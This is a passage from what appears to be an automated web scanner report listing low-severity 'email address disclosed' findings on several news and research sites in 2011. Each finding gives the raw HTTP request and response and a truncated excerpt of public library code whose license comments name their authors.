P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Wed, 11 Nov 2009 23:10:03 GMT
Accept-Ranges: bytes
Cache-Control: private
Connection: close
Content-Type: text/css
Content-Length: 20524

/* Yahoo! Research Style Sheet - Pras Sarkar: psarkar@yahoo-inc.com */

BODY                {
font-family            :arial,helvetica,sans-serif;
background-color    :#eeeef4;
background-image    :url(images/mainBg.gif);
background-repeat    :repeat-x;
margin                :0px;
padding                :0px;
/*h
...[SNIP]...

13.7. http://research.yahoo.com/themes/yresearch/style_drupal.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://research.yahoo.com
Path:   /themes/yresearch/style_drupal.css

Issue detail

The following email address was disclosed in the response:

Request

GET /themes/yresearch/style_drupal.css HTTP/1.1
Host: research.yahoo.com
Proxy-Connection: keep-alive
Referer: http://research.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; ydrupal=5ef1f7cc0e5b3a853c4b1d0deaa44289

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:27 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Thu, 23 Jul 2009 21:26:18 GMT
Accept-Ranges: bytes
Cache-Control: private
Connection: close
Content-Type: text/css
Content-Length: 3585

/* Yahoo! Research Style Sheet - Pras Sarkar: psarkar@yahoo-inc.com */

h1, h2, h3, h4, h5, h6 {
   font-family:Tahoma, Helvetica,Arial,sans-serif;
   font-weight:normal;
   margin:0pt;
   padding:0pt;
}
h1 {
   color:#4B546F;
   font-size:15px;
   font-weight:bold;
   margin:0 0 10p
...[SNIP]...

13.8. http://research.yahoo.com/themes/yresearch/style_edits-1.4.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://research.yahoo.com
Path:   /themes/yresearch/style_edits-1.4.css

Issue detail

The following email address was disclosed in the response:

Request

GET /themes/yresearch/style_edits-1.4.css HTTP/1.1
Host: research.yahoo.com
Proxy-Connection: keep-alive
Referer: http://research.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; ydrupal=5ef1f7cc0e5b3a853c4b1d0deaa44289

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:27 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Thu, 03 Jun 2010 20:42:07 GMT
Accept-Ranges: bytes
Cache-Control: private
Connection: close
Content-Type: text/css
Content-Length: 27400

/* Yahoo! Research Style Sheet - Pras Sarkar: psarkar@yahoo-inc.com */

body {
/*    background-color: #fff; */
   background-color: #EEEEF4;
   background-image: url(images/mainBg.gif);
   background-repeat: repeat-x;
}

#doc2 {
   margin:auto;text-align:left;
   width:73.84em/*
...[SNIP]...

13.9. http://savannahnow.com/sites/default/files/js/js_20f1b99cfdc38a8ea7818ec0c877dbfe.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /sites/default/files/js/js_20f1b99cfdc38a8ea7818ec0c877dbfe.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/default/files/js/js_20f1b99cfdc38a8ea7818ec0c877dbfe.js HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 12 Sep 2011 08:31:17 GMT
Server: Apache
Last-Modified: Mon, 12 Sep 2011 03:46:25 GMT
ETag: "49c2-4acb65f048640"-gzip
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Mon, 26 Sep 2011 08:31:17 GMT
Vary: Accept-Encoding
Content-Length: 18882
Content-Type: application/x-javascript
Age: 15421
X-Cache: HIT from sms4.morris.com
X-Cache-Lookup: HIT from sms4.morris.com:3128
Connection: keep-alive


var s_account=omni_account
var s=s_gi(s_account)
s.charSet="ISO-8859-1"
s.currencyCode="USD"
s.trackDownloadLinks=true
s.trackExternalLinks=true
s.trackInlineStats=true
s.linkDownloadFileTypes="exe,z
...[SNIP]...
7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=
...[SNIP]...

13.10. http://static.nowpublic.net/sf_js/core_bc99f0856175_190.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.nowpublic.net
Path:   /sf_js/core_bc99f0856175_190.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sf_js/core_bc99f0856175_190.js HTTP/1.1
Host: static.nowpublic.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:15 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n59 ( lax-agg-n46), ht lax-agg-n46.panthercdn.com
Cache-Control: max-age=31536000
Expires: Mon, 27 Aug 2012 00:13:44 GMT
Age: 1341271
Content-Length: 240302
Content-Type: application/x-javascript
Vary: Accept-Encoding
Last-Modified: Mon, 27 Dec 2010 13:30:55 GMT
Connection: keep-alive

(function(){
/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Da
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
var expires = '';
if (o
...[SNIP]...
]);
return fn.apply(scope, params);
};
};
}

if (Drupal.jsEnabled) {
// Initialize all functionality.
$(function() { Drupal.attachBehaviors(); });
}
;/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...
ooltip_objects[id].ft = (b_action == 'add') ? 'Remove' : 'Add';
return false;
}
}
return true;
}
};;/*
* jQuery UI Effects 1.5
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/
*
*/
;(function($) {

$.effects = $.effects || {}; //Add t
...[SNIP]...

13.11. http://static.nowpublic.net/sf_js/fp_9668f20645c9_190.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.nowpublic.net
Path:   /sf_js/fp_9668f20645c9_190.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sf_js/fp_9668f20645c9_190.js HTTP/1.1
Host: static.nowpublic.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:15 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n59 ( lax-agg-n15), ht lax-agg-n15.panthercdn.com
Cache-Control: max-age=31536000
Expires: Thu, 26 Apr 2012 02:11:36 GMT
Age: 11961399
Content-Length: 105993
Content-Type: application/x-javascript
Vary: Accept-Encoding
Last-Modified: Mon, 27 Dec 2010 13:30:55 GMT
Connection: keep-alive

/**
* jQuery.ScrollTo
* Copyright (c) 2007-2008 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
* Dual licensed under MIT and GPL.
* Date: 9/11/2008
*
* @projectDes
...[SNIP]...
<stanlemon@mac.com>
...[SNIP]...
.apply(this, [value]);

return r;
};

})((typeof NowPublicScan == 'object' && NowPublicScan.jQuery) || jQuery);
;/**
*
* jquery.sparkline.js
*
* v1.4.2
* (c) Splunk, Inc
* Contact: Gareth Watts (gareth@splunk.com)
* http://omnipotent.net/jquery.sparkline/
*
* Generates inline sparkline charts from data supplied either to the method
* or inline in HTML
*
* Compatible with Internet Explorer 6.0+ and modern brows
...[SNIP]...

13.12. http://video.fastcompany.com/companies/mansueto-digital/videos.rss

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.fastcompany.com
Path:   /companies/mansueto-digital/videos.rss

Issue detail

The following email address was disclosed in the response:

Request

GET /companies/mansueto-digital/videos.rss?ids=35a3467f31b51,5a74966232a47,1bc51eb069eb1,29b58b01bf488,79b00a7ba65dd,273bd40607339&append_image_to_description=false&verbosity=low&p=fc_playlist_homepage&template_ids=rtmp_only%2Cflowplayer%2Cflowplayer_bwcheck&assets=dynamic_stream_switching_capable&append_image_to_description=false&still_frame_height=180 HTTP/1.1
Host: video.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://video.fastcompany.com/plugins/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1603584230-1315849705375

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:10 GMT
Server: VoxCAST
Vary: Accept-Encoding
Cache-Control: max-age=900
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Status: 304
X-Runtime: 650
ETag: "ce4c2af2fcfc05fada03d16a43404a9c"
X-XML-Template: rtmp_only,flowplayer,flowplayer_bwcheck
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Cache: HIT from VoxCAST
Age: 800
Content-Length: 15582
Content-Type: application/rss+xml; charset=utf-8

<?xml version="1.0"?>
<rss xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:custom-field="http://service.twistage.com/custom_field_definitions" version="2.0">
...[SNIP]...
<media:credit role="uploader" scheme="urn:yvs">adam.barenblat@gmail.com</media:credit>
...[SNIP]...
<media:credit role="uploader" scheme="urn:yvs">adam.barenblat@gmail.com</media:credit>
...[SNIP]...
<media:credit role="uploader" scheme="urn:yvs">adam.barenblat@gmail.com</media:credit>
...[SNIP]...
<media:credit role="uploader" scheme="urn:yvs">adam.barenblat@gmail.com</media:credit>
...[SNIP]...
<media:credit role="uploader" scheme="urn:yvs">adam.barenblat@gmail.com</media:credit>
...[SNIP]...
<media:credit role="uploader" scheme="urn:yvs">adam.barenblat@gmail.com</media:credit>
...[SNIP]...

13.13. http://w.sharethis.com/button/buttons.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /button/buttons.js

Issue detail

The following email address was disclosed in the response:

Request

GET /button/buttons.js HTTP/1.1
Host: w.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.dome9.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Expires: Tue, 13 Sep 2011 12:03:16 GMT
Cache-Control: max-age=86400
Content-Length: 58953
Date: Mon, 12 Sep 2011 12:40:45 GMT
Connection: close
Vary: Accept-Encoding

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
rn false}stLight.processSTQ();stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.debug("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b=stLight.getSource();stLight.log("pview",b,"");stWidget.options.sessionID=stLight.sessionID;stWidget.options.fpc=stLight.fpc;stLight.loadServicesLoggedIn(function(){stButtons.onRead
...[SNIP]...

13.14. http://www.cargoh.com/sites/default/files/js/js_8a98a7cc05aa129e3debc64b291aa431.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargoh.com
Path:   /sites/default/files/js/js_8a98a7cc05aa129e3debc64b291aa431.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/default/files/js/js_8a98a7cc05aa129e3debc64b291aa431.js HTTP/1.1
Host: www.cargoh.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sun, 11 Sep 2011 12:45:31 GMT
ETag: "11ac006-df9a9-4aca9c925f0c0"
Cache-Control: max-age=1209600
Expires: Mon, 26 Sep 2011 10:58:36 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 915881
Date: Mon, 12 Sep 2011 12:48:37 GMT
X-Varnish: 1072006033 1071999763
Age: 6601
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT

// $Id: jquery.js,v 1.12.2.3 2008/06/25 09:38:39 goba Exp $

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

13.15. http://www.mtv.co.uk/misc/jquery-ui.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /misc/jquery-ui.min.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /misc/jquery-ui.min.js HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 24 Feb 2009 10:05:20 GMT
ETag: "2c623-44892-41b65800"
Accept-Ranges: bytes
Debug: lnioxp006wuk
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 280722
Cache-Control: max-age=593639
Expires: Mon, 19 Sep 2011 09:42:43 GMT
Date: Mon, 12 Sep 2011 12:48:44 GMT
Connection: close

/*
* jQuery UI 1.5.3
*
* Copyright (c) 2008 Paul Bakaus (ui.jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/U
...[SNIP]...
rabanski
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Datepicker
*
* Depends:
*    ui.core.js
*
* Marc Grabanski (m@marcgrabanski.com) and Keith Wood (kbwood@virginbroadband.com.au).
*/

(function($) { // hide the namespace

var PROP_NAME = 'datepicker';

/* Date picker manager.
Use the singleton instance of this class, $.datepicker, to interact with the date pick
...[SNIP]...
ion() {
   $(document.body).append($.datepicker.dpDiv).
       mousedown($.datepicker._checkExternalClick);
});

})(jQuery);
/*
* jQuery UI Effects 1.5.3
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/
*/
;(function($) {

$.effects = $.effects || {}; //Add the '
...[SNIP]...
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
* OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/

})(jQuery);
/*
* jQuery UI Effects Blind
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Blind
*
* Depends:
*    effects.core.js
*/
(function($) {

...[SNIP]...
       if(o.callback) o.callback.apply(el[0], arguments); // Callback
           el.dequeue();
       });
       
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Bounce
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Bounce
*
* Depends:
*    effects.core.js
*/
(function($) {

...[SNIP]...
s); // Callback
           });
       };
       el.queue('fx', function() { el.dequeue(); });
       el.dequeue();
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Clip
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Clip
*
* Depends:
*    effects.core.js
*/
(function($) {


...[SNIP]...
       if(o.callback) o.callback.apply(el[0], arguments); // Callback
           el.dequeue();
       }});
       
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Drop
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Drop
*
* Depends:
*    effects.core.js
*/
(function($) {


...[SNIP]...
           el.dequeue();
               
               $('.effects-explode').remove();
       
   }, o.duration || 500);
   
       
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Fold
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Fold
*
* Depends:
*    effects.core.js
*/
(function($) {


...[SNIP]...
f(o.callback) o.callback.apply(el[0], arguments); // Callback
           el.dequeue();
       });
       
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Highlight
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Highlight
*
* Depends:
*    effects.core.js
*/
;(function($)
...[SNIP]...
lter');
           if(o.callback) o.callback.apply(this, arguments);
           el.dequeue();
       }});
       
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Pulsate
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Pulsate
*
* Depends:
*    effects.core.js
*/
(function($) {
...[SNIP]...
); // Callback
           });
       };
       el.queue('fx', function() { el.dequeue(); });
       el.dequeue();
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Scale
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Scale
*
* Depends:
*    effects.core.js
*/
(function($) {

...[SNIP]...
           if(o.callback) o.callback.apply(this, arguments); // Callback
           el.dequeue();
       }});
       
   });

};

})(jQuery);
/*
* jQuery UI Effects Shake
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Shake
*
* Depends:
*    effects.core.js
*/
(function($) {

...[SNIP]...
guments); // Callback
       });
       el.queue('fx', function() { el.dequeue(); });
       el.dequeue();
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Slide
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Slide
*
* Depends:
*    effects.core.js
*/
(function($) {

...[SNIP]...
if(o.callback) o.callback.apply(this, arguments); // Callback
           el.dequeue();
       }});
       
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Transfer
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Transfer
*
* Depends:
*    effects.core.js
*/
(function($) {
...[SNIP]...

13.16. http://www.observer.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.observer.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.observer.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:06 GMT
Server: VoxCAST
Set-Cookie: visitor_page_count=1.5; expires=Mon, 12-Sep-2011 12:45:39 GMT; path=/
X-Powered-By: PHP/5.2.6-1+lenny10
X-Head-Server: Linux web7.observermediagroup.com 2.6.26-1-amd64 #1 SMP Sat Jan 10 17:57:00 UTC 2009 x86_64
X-Pingback: http://www.observer.com/xmlrpc.php
X-Cache: HIT from VoxCAST
Age: 148
Content-Length: 63799
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML>
<html dir="ltr" lang="en-US">
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!--[if lt IE 9]>
<script src="http://html5shim.google
...[SNIP]...
<a class="tip-us" target="_new" href="mailto:tips@observer.com">
...[SNIP]...

13.17. http://www.popsci.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.popsci.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: web4f D=18707
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Language: en
cache-control: max-age = 300
Content-Length: 116217
Date: Mon, 12 Sep 2011 12:48:09 GMT
X-Varnish: 1570744016 1570730120
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: webcache11: HIT 87

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
with JavaScript 1.0.
Source: Webmonkey Code Library
(http://www.hotwired.com/webmonkey/javascript/code_library/)
Author: Patrick Corcoran
Author Email: patrick@taylor.org
*/

var search_phrase;
var qsParm = new Array();

function parseURLParams(href) {
FORM_DATA = new Object();

...[SNIP]...

13.18. http://www.popsci.com/files/js/220b385f427499380964507975f14862.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /files/js/220b385f427499380964507975f14862.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /files/js/220b385f427499380964507975f14862.js HTTP/1.1
Host: www.popsci.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 27 Apr 2011 17:25:14 GMT
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4e D=12247
Content-Type: application/javascript
Content-Language: en
cache-control: max-age = 3600
Content-Length: 163407
Date: Mon, 12 Sep 2011 12:48:09 GMT
X-Varnish: 1570744021 1570741530
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: webcache11: HIT 8

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-12-0
...[SNIP]...
ion of
* emptying all containers that are used to load content into.
* @type undefined
*
* @name $.ajaxHistory.initialize()
* @cat Plugins/History
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
$.ajaxHistory = new function() {

var RESET_EVENT = 'historyReset';

var _currentHash = location.hash;
var _states = {};
var _intervalId = null;
var _observeHistory; // define
...[SNIP]...
lt value: "remote-".
* @param Function callback A single function that will be executed when the request is complete.
* @type jQuery
*
* @name remote
* @cat Plugins/Remote
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Implement Ajax driven links in a completely unobtrusive and accessible manner (also known as "Hijax")
* with support for the browser's back/forward navigation buttons and bookmarking.
*

...[SNIP]...
lt value: "remote-".
* @param Function callback A single function that will be executed when the request is complete.
* @type jQuery
*
* @name remote
* @cat Plugins/Remote
